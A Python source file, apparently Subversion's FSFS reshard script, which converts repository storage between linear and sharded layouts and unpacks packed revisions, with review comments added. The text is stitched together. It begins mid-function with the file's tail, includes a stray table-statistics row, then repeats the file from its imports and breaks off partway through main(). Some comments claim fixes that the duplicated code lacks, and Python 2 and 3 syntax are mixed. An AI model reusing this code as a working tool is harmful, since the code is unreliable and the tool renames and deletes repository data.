            print('Shard %d size: %d' % (current_shard, current_shard_size))
            shard_size_sum += current_shard_size
            if current_shard_size < min_shard_size:
                min_shard_size = current_shard_size
            if current_shard_size > max_shard_size:
                max_shard_size = current_shard_size
            current_shard_size = 0
            current_shard += 1
    if current_shard_size != 0:
        # Trailing, partially filled shard; excluded from min/max/average,
        # which only consider full shards.
        print('Shard %d size: %d' % (current_shard, current_shard_size))
    if current_shard > 0:
        # '//' keeps the Python 2 integer-division semantics on Python 3 too.
        print('Average full-shard size %d. Minimum: %d, Maximum: %d.' \
              % ((shard_size_sum // current_shard), min_shard_size, max_shard_size))
def reset_min_unpacked(min_unpacked_rev_path):
    """Reset min-unpacked-rev after unpack."""
    out = open(min_unpacked_rev_path, 'wb')
    try:
        out.write('0\n')
    finally:
        out.close()
def print_estimate_shards(repos_path, fs_format, min_unpacked_rev):
    """Print repository layout information and, for the current shard size
    (or a 'target=N' command-line override), the list of shard sizes that
    layout would produce."""
    # The fs_format argument is refreshed from disk before use.
    fs_format = check_fs_format(repos_path)
    target_shard = fs_format[1]
    if len(sys.argv) == 3 and sys.argv[2].startswith('target='):
        try:
            target_shard = int(sys.argv[2][7:])  # Remove "target="
        except (ValueError, OverflowError):
            # The original 'except ValueError, OverflowError:' only caught
            # ValueError, binding it to the name OverflowError.
            sys.stderr.write("error: target maximum files per shard ('%s') is not a valid number.\n" \
                             % sys.argv[2])
            sys.stderr.flush()
            sys.exit(1)
    revs_path = os.path.join(repos_path, 'db', 'revs')
    sys.stdout.write("Current FSFS db format version ")
    sys.stdout.write(fs_format[0])  # the raw string from db/format
    if fs_format[1] > 0:
        sys.stdout.write(" with sharded layout, max files per shard: ")
        sys.stdout.write(str(fs_format[1]))
        if min_unpacked_rev > 0:
            sys.stdout.write(", packed shards: ")
            # '//' preserves the intended integer division on Python 3 too.
            sys.stdout.write(str(min_unpacked_rev // fs_format[1]))
    else:
        sys.stdout.write(" with linear layout")
    check_packed_shards_logical(fs_format, min_unpacked_rev) # and exits if so
    if target_shard > 0:
        sys.stdout.write(".\nList of shard sizes for max files per shard = ")
        sys.stdout.write(str(target_shard))
        sys.stdout.write("\n")
        revs_size = compute_rev_sizes(revs_path, fs_format[1], False)
        compute_shard_sizes(revs_size, target_shard)
    else:
        sys.stdout.write(".\n")
    sys.stdout.flush()
def main():
    """Command-line driver: analyse the FSFS repository given as
    sys.argv[1], or re-shard it to sys.argv[2] files per shard (optionally
    restricted to revisions sys.argv[3]..sys.argv[4]).  See usage()."""
    if len(sys.argv) < 2:
        usage()
    repos_path = sys.argv[1]
    # Get [number format, sharded]
    fs_format = check_fs_format(repos_path)
    # Get minimum unpacked revision, Subversion >= 1.6
    min_unpacked_rev = 0
    min_unpacked_rev_path = os.path.join(repos_path, 'db', 'min-unpacked-rev')
    if os.path.exists(min_unpacked_rev_path):
        min_unpacked_rev_file = open(min_unpacked_rev_path)
        try:
            min_unpacked_rev = int(min_unpacked_rev_file.readline())
        # NOTE(review): 'except ValueError, OverflowError' catches only
        # ValueError (binding it to the name OverflowError); catching both
        # requires 'except (ValueError, OverflowError):'.
        except ValueError, OverflowError:
            sys.stderr.write("error: repository db/min-unpacked-rev does not contain a valid number.\n")
            sys.stderr.flush()
            sys.exit(1)
        min_unpacked_rev_file.close()
    # NOTE(review): only IndexError is handled here, so a non-numeric
    # sys.argv[3]/sys.argv[4] raises an uncaught ValueError.
    try:
        start = int(sys.argv[3])
        end = int(sys.argv[4])
    except IndexError:
        start = 0
        end = int(current_file(repos_path)[0])
    # Validate the command-line arguments.
    db_path = os.path.join(repos_path, 'db')
    current_path = os.path.join(db_path, 'current')
    if not os.path.exists(current_path):
        sys.stderr.write("error: '%s' doesn't appear to be a Subversion FSFS repository.\n" \
                         % repos_path)
        sys.stderr.flush()
        sys.exit(1)
    # No shard-size argument (or only 'target=N'): report, don't convert.
    if len(sys.argv) == 2 or (len(sys.argv) == 3 and sys.argv[2].startswith('target=')):
        print_estimate_shards(repos_path, fs_format, min_unpacked_rev)
        sys.exit(0)
    try:
        max_files_per_shard = int(sys.argv[2])
    # NOTE(review): same broken two-name except clause as above.
    except ValueError, OverflowError:
        sys.stderr.write("error: maximum files per shard ('%s') is not a valid number.\n" \
                         % sys.argv[2])
        sys.stderr.flush()
        sys.exit(1)
    if max_files_per_shard < 0:
        sys.stderr.write("error: maximum files per shard ('%d') must not be negative.\n" \
                         % max_files_per_shard)
        sys.stderr.flush()
        sys.exit(1)
    # Check the format of the repository.
    check_repos_format(repos_path)
    # Conversion is needed whenever the requested shard size differs from
    # the current one (0 means linear layout).
    reshard = max_files_per_shard != fs_format[1]
    if not reshard:
        print_estimate_shards(repos_path, fs_format, min_unpacked_rev)
        sys.exit(0)
    check_packed_shards_logical(fs_format, min_unpacked_rev) # and exits if so
    # Let the user know what's going on.
    if max_files_per_shard > 0:
        print("Converting '%s' to a sharded structure with %d files per directory" \
              % (repos_path, max_files_per_shard))
        if min_unpacked_rev > 0:
            print('(will unpack)')
        if reshard:
            print('(will convert to a linear structure)')
    else:
        print("Converting '%s' to a linear structure" % repos_path)
    # Prevent access to the repository for the duration of the conversion.
    # There's no clean way to do this, but since the format of the repository
    # is indeterminate, let's remove the format file while we're converting.
    print('- marking the repository as invalid')
    backup_fs_format(repos_path)
    # First, convert to a linear scheme (this makes recovery easier)
    if fs_format[1] > 0:
        revs_path = os.path.join(repos_path, 'db', 'revs')
        if min_unpacked_rev > 0:
            # First unpack
            if is_packed_revprops_compressed(repos_path):
                incompatible_fs_format(repos_path, fs_format[0])
            print('- unpacking db/revs')
            compute_rev_sizes(revs_path, fs_format[1], True)
            print('- unpacking db/revprops')
            unpack_revprops_shards(os.path.join(repos_path, 'db', 'revprops'), fs_format[1])
            min_unpacked_rev = 0
            reset_min_unpacked(min_unpacked_rev_path)
        # If sharding is different, convert to a linear scheme
        if reshard:
            print('- linearising db/revs')
            linearise(revs_path)
            print('- linearising db/revprops')
            linearise(os.path.join(repos_path, 'db', 'revprops'))
    if reshard and max_files_per_shard > 0:
        print('- sharding db/revs')
        shard(os.path.join(repos_path, 'db', 'revs'), max_files_per_shard,
              start, end)
        print('- sharding db/revprops')
        shard(os.path.join(repos_path, 'db', 'revprops'), max_files_per_shard,
              start, end)
    fs_format[1] = max_files_per_shard
    if max_files_per_shard == 0:
        print('- marking the repository as a valid linear repository')
    else:
        # Sharded. Keep original 3/4 format or upgrade format 2 to 3.
        # NOTE(review): check_fs_format() stores the format number as a
        # *string*, so 'fs_format[0] == 2' is never true and the intended
        # 2 -> 3 upgrade never happens; compare against int(fs_format[0]).
        if fs_format[0] == 2:
            fs_format[0] = 3
        print('- marking the repository as a valid sharded repository')
    # We're done. Stamp the filesystem with a format 2/3/4/6/7 db/format file.
    write_fs_format(repos_path, fs_format)
    print('- done.')
    sys.exit(0)
# The "unfinished" guard must run *before* main(): main() always terminates
# the process via sys.exit(), so with the original ordering (main() first,
# guard second) the safety check below could never fire.
if __name__ == '__main__':
    raise Exception("""This script is unfinished and not ready to be used on live data.
Trust us. Prepare a backup and run svnadmin verify before putting your repo online""")
main()
| 37.146776 | 98 | 0.70229 |
import os, stat, sys, shutil
from errno import EEXIST
from sets import Set
import ConfigParser
def usage():
    """Print a usage message and exit."""
    # The template contains two '%s' slots (one per usage form), so the
    # program name must be supplied twice; the original passed a single
    # '% sys.argv[0]', which raises TypeError: not enough arguments for
    # format string.
    print("""usage: %s REPOS_PATH [target=MAX_FILES_PER_SHARD]
 Computes shard sizes for current repository or for a target
 MAX_FILES_PER_SHARD to tune this parameter according to
 performance criteria.
usage: %s REPOS_PATH MAX_FILES_PER_SHARD [START END]
Perform an offline conversion of an FSFS repository between linear
(readable by Subversion 1.4 or later) and sharded (readable by
Subversion 1.5 or later) layouts.
It is recommended to first upgrade your repository to your current
Subversion release with 'svnadmin upgrade REPOS_PATH'.
Packed shards are unpacked before converting. According to your
needs, you may want to invoke 'svnadmin pack REPOS_PATH' after.
The MAX_FILES_PER_SHARD argument specifies the maximum number of
files that will be stored in each shard (directory), or zero to
specify a linear layout. Subversion 1.5 uses a default value of
1000 files per shard.
Convert revisions START through END inclusive if specified, or all
revisions if unspecified.
""" % (sys.argv[0], sys.argv[0]))
    sys.exit(1)
def incompatible_repos_format(repos_path, format):
    """Print an error saying that REPOS_PATH is a repository with an
    incompatible repository format FORMAT, then exit."""
    message = """error: unable to convert repository '%s'.
This repository is not compatible with this tool. Valid
repository formats are '3' or '5'; this repository is
format '%s'.
""" % (repos_path, format)
    sys.stderr.write(message)
    sys.stderr.flush()
    sys.exit(1)
def incompatible_fs_format(repos_path, format):
    """Print an error saying that REPOS_PATH is a repository with an
    incompatible filesystem format FORMAT, then exit."""
    message = """error: unable to open repository '%s'.
This repository contains a filesystem that is not compatible with
this tool. Valid filesystem formats are '1', '2', '3', '4' or '6'; this
repository contains a filesystem with format '%s'.
Compressed packed revprops is not supported.
Packed shards with logical addressing cannot be analyzed or unpacked.
""" % (repos_path, format)
    sys.stderr.write(message)
    sys.stderr.flush()
    sys.exit(1)
def unexpected_fs_format_options(repos_path):
    """Print an error saying that REPOS_PATH is a repository with
    unexpected filesystem format options, then exit."""
    message = """error: unable to open repository '%s'.
This repository contains a filesystem that appears to be invalid -
there is unexpected data after the filesystem format number.
""" % repos_path
    sys.stderr.write(message)
    sys.stderr.flush()
    sys.exit(1)
def incompatible_fs_format_option(repos_path, option):
    """Print an error saying that REPOS_PATH is a repository with an
    incompatible filesystem format option OPTION, then exit."""
    message = """error: unable to convert repository '%s'.
This repository contains a filesystem that is not compatible with
this tool. This tool recognises the 'layout' and 'addressing'
options but the filesystem uses the '%s' option.
""" % (repos_path, option)
    sys.stderr.write(message)
    sys.stderr.flush()
    sys.exit(1)
def warn_about_fs_format_1(repos_path, format_path):
    """Print a warning saying that REPOS_PATH contains a format 1 FSFS
    filesystem that we can't reconstruct, then exit."""
    message = """warning: conversion of '%s' will be one-way.
This repository is currently readable by Subversion 1.1 or later.
This tool can convert this repository to one that is readable by
either Subversion 1.4 (or later) or Subversion 1.5 (or later),
but it is not able to convert it back to the original format - a
separate dump/load step would be required.
If you would like to upgrade this repository anyway, delete the
file '%s' and re-run this tool.
""" % (repos_path, format_path)
    sys.stderr.write(message)
    sys.stderr.flush()
    sys.exit(1)
def check_repos_format(repos_path):
    """Check that REPOS_PATH contains a repository with a suitable format;
    print a message and exit if not."""
    format_path = os.path.join(repos_path, 'format')
    try:
        # 'with' guarantees the handle is closed (the original leaked it).
        with open(format_path) as format_file:
            format = format_file.readline()
        if not format.endswith('\n'):
            incompatible_repos_format(repos_path, format + ' <missing newline>')
        format = format.rstrip('\n')
        if format not in ('3', '5'):
            # Only the repository formats named in the error message are
            # supported by this tool.
            incompatible_repos_format(repos_path, format)
    except IOError:
        # In all likelihood, the file doesn't exist.
        incompatible_repos_format(repos_path, '<unreadable>')
def is_packed_revprops_compressed(repos_path):
    """Check if repository at REPOS_PATH has compressed revprops enabled."""
    fsfsconf_path = os.path.join(repos_path, 'db', 'fsfs.conf')
    parser = ConfigParser.ConfigParser()
    try:
        parser.read(fsfsconf_path)
        return parser.getboolean('packed-revprops', 'compress-packed-revprops')
    except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
        # Section absent or option commented out: compression is off.
        return False
    except IOError:
        incompatible_repos_format(repos_path, '<unreadable>')
def check_packed_shards_logical(fs_format, min_unpacked_rev):
    """Check if repository with logical addressing has packed shards."""
    # Only the combination "logical addressing + at least one packed
    # shard" is fatal; everything else is fine.
    if not (fs_format[2] == "logical" and min_unpacked_rev > 0):
        return False
    sys.stdout.write("\n")
    sys.stdout.flush()
    sys.stderr.write("Packed shards with logical addressing cannot be analyzed or unpacked.\n")
    sys.stderr.flush()
    sys.exit(1)
def check_fs_format(repos_path):
    """Check that REPOS_PATH contains a filesystem with a suitable format,
    or that it contains no format file; print a message and exit if neither
    is true.

    Returns a 3-element list [format number, shard size, addressing]:
    format number is the *string* read from db/format (or 0 if unreadable),
    shard size is 0 for a linear layout, and addressing is None unless an
    'addressing' option line is present (format 7).
    """
    result = [0, 0, None]
    db_path = os.path.join(repos_path, 'db')
    format_path = os.path.join(db_path, 'format')
    if not(os.path.exists(format_path)):
        # Recover from format.bak if interrupted
        format_path = os.path.join(db_path, 'format.bak')
        if not(os.path.exists(format_path)):
            sys.stderr.write("error: db/format and db/format.bak missing.\n")
            sys.stderr.flush()
            sys.exit(1)
    try:
        format_file = open(format_path)
        format = format_file.readline()
        if not format.endswith('\n'):
            incompatible_fs_format(repos_path, format + ' <missing newline>')
        format = format.rstrip('\n')
        if format == '1':
            # Format 1 (svndiff0 only) can be upgraded but not converted
            # back; warn_about_fs_format_1 prints the details and exits.
            warn_about_fs_format_1(repos_path, format_path)
        if format == '2' or format == '3' or format == '4' or format == '6' or format == '7':
            pass
        else:
            incompatible_fs_format(repos_path, format)
        # Note: stored as the raw string, not an int (callers must convert
        # before numeric comparisons).
        result[0] = format;
        # Remaining lines are option lines ('layout ...', 'addressing ...');
        # format 2 must not have any.
        for line in format_file:
            if format == '2':
                unexpected_fs_format_options(repos_path)
            line = line.rstrip('\n')
            if line == 'layout linear':
                pass
            elif line.startswith('layout sharded '):
                result[1] = int(line[15:])
            elif line.startswith('addressing '):
                result[2] = line[11:]
            else:
                incompatible_fs_format_option(repos_path, line)
        format_file.close()
    except IOError:
        # The format file might not exist if we've previously been
        # interrupted mid-conversion; treat that as compatible.
        pass
    return result
def current_file(repos_path):
    """Return triple of (revision, next_node_id, next_copy_id) from
    REPOS_PATH/db/current ."""
    # 'with' closes the handle; the original left the file object open.
    with open(os.path.join(repos_path, 'db', 'current')) as current:
        return current.readline().split()
def backup_fs_format(repos_path):
    """Rename the filesystem format file for repository REPOS_PATH.
    Do not raise an error if the file is already renamed."""
    format_path = os.path.join(repos_path, 'db', 'format')
    try:
        statinfo = os.stat(format_path)
    except OSError:
        # The file probably doesn't exist (already renamed on a previous,
        # interrupted run); nothing to back up.
        return
    format_bak_path = os.path.join(repos_path, 'db', 'format.bak')
    # Make the file owner-writable before moving it; permissions and
    # owner/group are preserved across the rename.
    os.chmod(format_path, statinfo.st_mode | stat.S_IWUSR)
    try:
        os.rename(format_path, format_bak_path)
    except OSError:
        # A stale backup may block the rename (on platforms where rename
        # does not overwrite — presumably Windows; POSIX rename replaces
        # the target).  Remove it and retry.
        os.remove(format_bak_path)
        os.rename(format_path, format_bak_path)
def write_fs_format(repos_path, fs_format):
    """Write a new filesystem format file for repository REPOS_PATH
    according to fs_format information ([format number, shard size,
    addressing], as produced by check_fs_format)."""
    format_path = os.path.join(repos_path, 'db', 'format')
    format_bak_path = os.path.join(repos_path, 'db', 'format.bak')
    # Permissions and owner/group are preserved with rename.
    try:
        os.rename(format_bak_path, format_path)
    except OSError:
        # Unexpected, but try to go on.
        os.remove(format_path)
    # fs_format[0] is normally the *string* read from db/format (see
    # check_fs_format), though main() may replace it with the integer 3 on
    # a 2 -> 3 upgrade.  Normalise to an int for the comparisons below: the
    # original compared the raw string against an int, which under Python 2
    # is always true ('2' > 2 for any string), so even a format-2 repository
    # would wrongly be given a 'layout' line.
    format_number = int(fs_format[0])
    f = open(format_path, 'wb')
    try:
        f.write(str(fs_format[0]))  # Version (str() tolerates the int form)
        f.write('\n')
        if format_number > 2:
            # Format 3+ records the shard layout explicitly.
            if fs_format[1] > 0:
                f.write('layout sharded %d\n' % fs_format[1])
            else:
                f.write('layout linear\n')
        if format_number > 6 and fs_format[2] is not None:
            f.write('addressing %s\n' % fs_format[2])
    finally:
        f.close()
def suffix_unpacked_shard(path):
    """Add '.shard' suffix to unpacked shard number directory."""
    for entry in os.listdir(path):
        # Already-marked shards and still-packed shards are left alone.
        if entry.endswith(('.shard', '.pack')):
            continue
        entry_path = os.path.join(path, entry)
        if os.path.isdir(entry_path):
            os.rename(entry_path, entry_path + '.shard')
def linearise(path):
    """Move all the files in subdirectories of PATH into PATH, and remove the
    subdirectories.  Name clashes between a subdirectory and a file it holds
    are avoided by first giving every unpacked shard directory a '.shard'
    suffix (the files themselves never carry that suffix).  Abort if a
    subdirectory turns out to contain another subdirectory."""
    suffix_unpacked_shard(path)
    # Pull every file up into PATH, then drop the emptied subdirectories.
    for subdir_path, subdirs, files in os.walk(path):
        if subdir_path == path:
            continue
        if subdirs:
            sys.stderr.write("error: directory '%s' contains other unexpected directories.\n" \
                             % subdir_path)
            sys.stderr.flush()
            sys.exit(1)
        for filename in files:
            os.rename(os.path.join(subdir_path, filename),
                      os.path.join(path, filename))
        os.rmdir(subdir_path)
def shard(path, max_files_per_shard, start, end):
    """Move the files for revisions START to END inclusive in PATH into
    subdirectories of PATH named such that subdirectory '0' contains at most
    MAX_FILES_PER_SHARD files, those named [0, MAX_FILES_PER_SHARD).  Abort if
    PATH is found to contain any entries with non-numeric names."""
    tmp = path + '.reshard'
    try:
        os.mkdir(tmp)
    except OSError as e:  # 'as' is valid on Python 2.6+ and 3.x; ', e' is 2-only
        if e.errno != EEXIST:
            raise
    # Move all entries into staging shards named N.shard.
    for rev in range(start, end + 1):
        name = str(rev)
        # Renamed from 'shard', which shadowed this function itself.
        shard_index = rev // max_files_per_shard
        shard_name = str(shard_index) + '.shard'
        from_path = os.path.join(path, name)
        to_path = os.path.join(tmp, shard_name, name)
        try:
            os.rename(from_path, to_path)
        except OSError:
            # The most likely explanation is that the shard directory doesn't
            # exist.  Create it and retry the rename (a genuinely missing
            # revision file will make the retry raise).
            os.mkdir(os.path.join(tmp, shard_name))
            os.rename(from_path, to_path)
    # Now rename all the shards to remove the suffix.
    skipped = 0
    for name in os.listdir(tmp):
        if not name.endswith('.shard'):
            sys.stderr.write("warning: ignoring unexpected subdirectory '%s'.\n" \
                             % os.path.join(tmp, name))
            sys.stderr.flush()
            skipped += 1
            continue
        from_path = os.path.join(tmp, name)
        to_path = os.path.join(path, os.path.basename(from_path)[:-6])
        os.rename(from_path, to_path)
    # Only remove the staging directory when nothing unexpected was left in it.
    if skipped == 0:
        os.rmdir(tmp)
def extract_part(source, start_position, end_position, target_file):
    """Copy bytes [START_POSITION, END_POSITION) of the open file SOURCE
    into a newly created TARGET_FILE (parent directories are created as
    needed).  Return the position reached in SOURCE after copying."""
    copy_buffer_size = 4096
    target_dir = os.path.dirname(target_file)
    if not os.path.exists(target_dir):
        os.makedirs(target_dir)
    target = open(target_file, 'wb')
    try:
        last_position = start_position
        source.seek(last_position)
        while last_position < end_position:
            bytes_tocopy = min(copy_buffer_size, end_position - last_position)
            rev_buffer = source.read(bytes_tocopy)
            if not rev_buffer:
                # Premature EOF (truncated source).  The original looped
                # forever here: an empty read never advanced last_position.
                break
            target.write(rev_buffer)
            last_position += len(rev_buffer)
    finally:
        target.close()
    return last_position
def unpack_shard(packed_path, shard_number, unpack, first_rev, revs_size):
    """Compute the size of every revision stored in the packed shard at
    PACKED_PATH and record it in the REVS_SIZE dict, keyed by revision
    number starting at FIRST_REV.  When UNPACK is true, also extract each
    revision out of the shard's 'pack' file into ../<shard_number>/<rev>.

    Returns REVS_SIZE (the same dict, updated in place).
    """
    # The manifest lists, one per line and in revision order, the byte
    # offset of each revision inside the 'pack' file; a revision's size is
    # the distance to the next offset (or to the end of 'pack').
    manifest = open(os.path.join(packed_path, 'manifest'), 'r')
    pack_path = os.path.join(packed_path, 'pack')
    end_pack = os.path.getsize(pack_path)
    if unpack:
        pack = open(pack_path, 'rb')
    last_position = int(manifest.readline())
    rev_index = first_rev
    while last_position < end_pack:
        # Read the next revision's start byte from the manifest.
        try:
            byte_position = int(manifest.readline())
        except ValueError:
            # Last revision: readline() returned '', so it extends to the
            # end of the pack file.
            byte_position = end_pack
        revs_size[rev_index] = byte_position - last_position
        if unpack:
            # Extract the revision from the pack file into the
            # corresponding shard directory.
            arev = os.path.join(packed_path, os.path.pardir, str(shard_number), str(rev_index))
            last_position = extract_part(pack, last_position, byte_position, arev)
        else:
            last_position = byte_position
        rev_index += 1
    # Close file descriptors.
    manifest.close()
    if unpack:
        pack.close()
    return revs_size
def unpack_revprops_shard(packed_path, shard_number, first_rev):
    """Unpack a single packed revision-properties shard at PACKED_PATH back
    into linear files ../<shard_number>/<rev>, starting at revision
    FIRST_REV.

    The shard's 'manifest' names, one line per revision, which pack file
    inside the shard holds that revision's properties; each pack file then
    carries a header (first revision, revision count, per-revision sizes)
    followed by the concatenated property data.
    """
    # revprops_packfile: revision number -> name of the pack file that
    # (according to the manifest) holds that revision's properties.
    revprops_packfile = {}
    packfiles = Set()  # sets.Set: this script targets Python 2
    with open(os.path.join(packed_path, 'manifest'), 'rb') as manifest:
        for revfile in manifest:
            revfile = revfile.rstrip('\n')
            revprops_packfile[first_rev] = revfile
            packfiles.add(revfile)
            first_rev += 1
    for apackfile in packfiles:
        packrevprops = open(os.path.join(packed_path, apackfile), 'rb')
        # Skip the uncompressed-content-size header.
        # NOTE(review): read(2) assumes that header is exactly two bytes
        # wide — confirm against the FSFS packed-revprops format.
        packrevprops.read(2)
        # Parse the header: first revision, revision count, then one size
        # per revision.
        rev = int(packrevprops.readline())
        rev_count = int(packrevprops.readline())
        end_rev = rev + rev_count - 1
        revprop_sizes = {}
        for r in range(rev, rev + rev_count):
            revprop_sizes[r] = int(packrevprops.readline())
        # Skip the separator line between the size list and the data.
        packrevprops.readline()
        last_position = packrevprops.tell()
        while rev <= end_rev:
            end_position = last_position + revprop_sizes[rev]
            if apackfile == revprops_packfile[rev]:
                # Extract the revprops the manifest attributes to this file.
                arev = os.path.join(packed_path, os.path.pardir, str(shard_number), str(rev))
                last_position = extract_part(packrevprops, last_position, end_position, arev)
            else:
                # Revision lives in a different pack file: skip over it.
                last_position = end_position
            rev += 1
        # Close file descriptors.
        packrevprops.close()
def unpack_revprops_shards(revprops_path, current_shard):
    """Unpack revision properties shards"""
    for parent, subdirs, _files in os.walk(revprops_path):
        packed = [d for d in subdirs if d.endswith('.pack')]
        for dirname in packed:
            number = int(dirname[:-5])
            packed_path = os.path.join(parent, dirname)
            first_rev = current_shard * number if number > 0 else 1
            unpack_revprops_shard(packed_path, number, first_rev)
            # Drop the x.pack structure once its contents are unpacked.
            shutil.rmtree(packed_path)
def compute_rev_sizes(revs_path, current_shard, unpack):
    """Compute revision sizes based on current shard capacity Support either
    linear, sharded or packed revisions. If unpack is True, packed sharded are
    unpacked too.
    """
    revs_size = {}
    for parent, subdirs, files in os.walk(revs_path):
        # Plain (linear or already-sharded) revision files: size directly.
        for filename in files:
            try:
                revnum = int(filename)
            except ValueError:
                continue  # not a revision file (e.g. 'manifest' or 'pack')
            revs_size[revnum] = os.path.getsize(os.path.join(parent, filename))
        # Packed shards: sizes come from the shard's manifest.
        for dirname in subdirs:
            if not dirname.endswith('.pack'):
                continue
            shard_number = int(dirname[:-5])
            shard_path = os.path.join(parent, dirname)
            revs_size = unpack_shard(shard_path, shard_number, unpack,
                                     current_shard * shard_number, revs_size)
            if unpack:
                # Drop the x.pack structure once unpacked.
                shutil.rmtree(shard_path)
    return revs_size
def compute_shard_sizes(revs_size, max_files_per_shard):
    """Print the on-disk size of each shard that a layout with
    MAX_FILES_PER_SHARD files per shard would produce, given REVS_SIZE, a
    dict mapping revision number -> revision file size, followed by the
    minimum/maximum/average size of the full shards."""
    current_shard = 0
    current_shard_size = 0
    min_shard_size = 2**63
    max_shard_size = 0
    shard_size_sum = 0
    # Iterate in revision order: Python 2 dict iteration order is
    # arbitrary, and the running per-shard total is only meaningful when
    # consecutive revisions are accumulated together (the original used
    # iteritems() and could mix revisions from different shards).
    for i, size in sorted(revs_size.items()):
        current_shard_size += size
        if ((i + 1) % max_files_per_shard) == 0:
            # Shard boundary reached: report and reset the running total.
            print('Shard %d size: %d' % (current_shard, current_shard_size))
            shard_size_sum += current_shard_size
            if current_shard_size < min_shard_size:
                min_shard_size = current_shard_size
            if current_shard_size > max_shard_size:
                max_shard_size = current_shard_size
            current_shard_size = 0
            current_shard += 1
    if current_shard_size != 0:
        # Trailing, partially filled shard; excluded from min/max/average,
        # which only consider full shards.
        print('Shard %d size: %d' % (current_shard, current_shard_size))
    if current_shard > 0:
        # '//' keeps the Python 2 integer-division semantics on Python 3 too.
        print('Average full-shard size %d. Minimum: %d, Maximum: %d.' \
              % ((shard_size_sum // current_shard), min_shard_size, max_shard_size))
def reset_min_unpacked(min_unpacked_rev_path):
    """Reset min-unpacked-rev after unpack."""
    out = open(min_unpacked_rev_path, 'wb')
    try:
        out.write('0\n')
    finally:
        out.close()
def print_estimate_shards(repos_path, fs_format, min_unpacked_rev):
    """Print repository layout information and, for the current shard size
    (or a 'target=N' command-line override), the list of shard sizes that
    layout would produce."""
    # The fs_format argument is refreshed from disk before use.
    fs_format = check_fs_format(repos_path)
    target_shard = fs_format[1]
    if len(sys.argv) == 3 and sys.argv[2].startswith('target='):
        try:
            target_shard = int(sys.argv[2][7:])  # Remove "target="
        except (ValueError, OverflowError):
            # The original 'except ValueError, OverflowError:' only caught
            # ValueError, binding it to the name OverflowError.
            sys.stderr.write("error: target maximum files per shard ('%s') is not a valid number.\n" \
                             % sys.argv[2])
            sys.stderr.flush()
            sys.exit(1)
    revs_path = os.path.join(repos_path, 'db', 'revs')
    sys.stdout.write("Current FSFS db format version ")
    sys.stdout.write(fs_format[0])  # the raw string from db/format
    if fs_format[1] > 0:
        sys.stdout.write(" with sharded layout, max files per shard: ")
        sys.stdout.write(str(fs_format[1]))
        if min_unpacked_rev > 0:
            sys.stdout.write(", packed shards: ")
            # '//' preserves the intended integer division on Python 3 too.
            sys.stdout.write(str(min_unpacked_rev // fs_format[1]))
    else:
        sys.stdout.write(" with linear layout")
    check_packed_shards_logical(fs_format, min_unpacked_rev)  # and exits if so
    if target_shard > 0:
        sys.stdout.write(".\nList of shard sizes for max files per shard = ")
        sys.stdout.write(str(target_shard))
        sys.stdout.write("\n")
        revs_size = compute_rev_sizes(revs_path, fs_format[1], False)
        compute_shard_sizes(revs_size, target_shard)
    else:
        sys.stdout.write(".\n")
    sys.stdout.flush()
def main():
    """Command-line driver: analyse the FSFS repository given as
    sys.argv[1], or re-shard it to sys.argv[2] files per shard (optionally
    restricted to revisions sys.argv[3]..sys.argv[4]).  See usage()."""
    if len(sys.argv) < 2:
        usage()
    repos_path = sys.argv[1]
    # fs_format is [format number (string), shard size, addressing].
    fs_format = check_fs_format(repos_path)
    # Minimum unpacked revision, present for Subversion >= 1.6.
    min_unpacked_rev = 0
    min_unpacked_rev_path = os.path.join(repos_path, 'db', 'min-unpacked-rev')
    if os.path.exists(min_unpacked_rev_path):
        min_unpacked_rev_file = open(min_unpacked_rev_path)
        try:
            min_unpacked_rev = int(min_unpacked_rev_file.readline())
        # NOTE(review): 'except ValueError, OverflowError' catches only
        # ValueError (binding it to the name OverflowError); catching both
        # requires 'except (ValueError, OverflowError):'.
        except ValueError, OverflowError:
            sys.stderr.write("error: repository db/min-unpacked-rev does not contain a valid number.\n")
            sys.stderr.flush()
            sys.exit(1)
        min_unpacked_rev_file.close()
    # NOTE(review): only IndexError is handled here, so a non-numeric
    # sys.argv[3]/sys.argv[4] raises an uncaught ValueError.
    try:
        start = int(sys.argv[3])
        end = int(sys.argv[4])
    except IndexError:
        start = 0
        end = int(current_file(repos_path)[0])
    # Validate that repos_path really is an FSFS repository.
    db_path = os.path.join(repos_path, 'db')
    current_path = os.path.join(db_path, 'current')
    if not os.path.exists(current_path):
        sys.stderr.write("error: '%s' doesn't appear to be a Subversion FSFS repository.\n" \
                         % repos_path)
        sys.stderr.flush()
        sys.exit(1)
    # No shard-size argument (or only 'target=N'): report, don't convert.
    if len(sys.argv) == 2 or (len(sys.argv) == 3 and sys.argv[2].startswith('target=')):
        print_estimate_shards(repos_path, fs_format, min_unpacked_rev)
        sys.exit(0)
    try:
        max_files_per_shard = int(sys.argv[2])
    # NOTE(review): same broken two-name except clause as above.
    except ValueError, OverflowError:
        sys.stderr.write("error: maximum files per shard ('%s') is not a valid number.\n" \
                         % sys.argv[2])
        sys.stderr.flush()
        sys.exit(1)
    if max_files_per_shard < 0:
        sys.stderr.write("error: maximum files per shard ('%d') must not be negative.\n" \
                         % max_files_per_shard)
        sys.stderr.flush()
        sys.exit(1)
    # Check the format of the repository.
    check_repos_format(repos_path)
    # Conversion is needed whenever the requested shard size differs from
    # the current one (0 means linear layout).
    reshard = max_files_per_shard != fs_format[1]
    if not reshard:
        print_estimate_shards(repos_path, fs_format, min_unpacked_rev)
        sys.exit(0)
    check_packed_shards_logical(fs_format, min_unpacked_rev) # and exits if so
    # Let the user know what's going on.
    if max_files_per_shard > 0:
        print("Converting '%s' to a sharded structure with %d files per directory" \
              % (repos_path, max_files_per_shard))
        if min_unpacked_rev > 0:
            print('(will unpack)')
        if reshard:
            print('(will convert to a linear structure)')
    else:
        print("Converting '%s' to a linear structure" % repos_path)
    # Prevent access to the repository for the duration of the conversion.
    # There's no clean way to do this, but since the format of the repository
    # is indeterminate, let's remove the format file while we're converting.
    print('- marking the repository as invalid')
    backup_fs_format(repos_path)
    # First, convert to a linear scheme (this makes recovery easier).
    if fs_format[1] > 0:
        revs_path = os.path.join(repos_path, 'db', 'revs')
        if min_unpacked_rev > 0:
            # First unpack; compressed packed revprops are unsupported.
            if is_packed_revprops_compressed(repos_path):
                incompatible_fs_format(repos_path, fs_format[0])
            print('- unpacking db/revs')
            compute_rev_sizes(revs_path, fs_format[1], True)
            print('- unpacking db/revprops')
            unpack_revprops_shards(os.path.join(repos_path, 'db', 'revprops'), fs_format[1])
            min_unpacked_rev = 0
            reset_min_unpacked(min_unpacked_rev_path)
        # If sharding is different, convert to a linear scheme.
        if reshard:
            print('- linearising db/revs')
            linearise(revs_path)
            print('- linearising db/revprops')
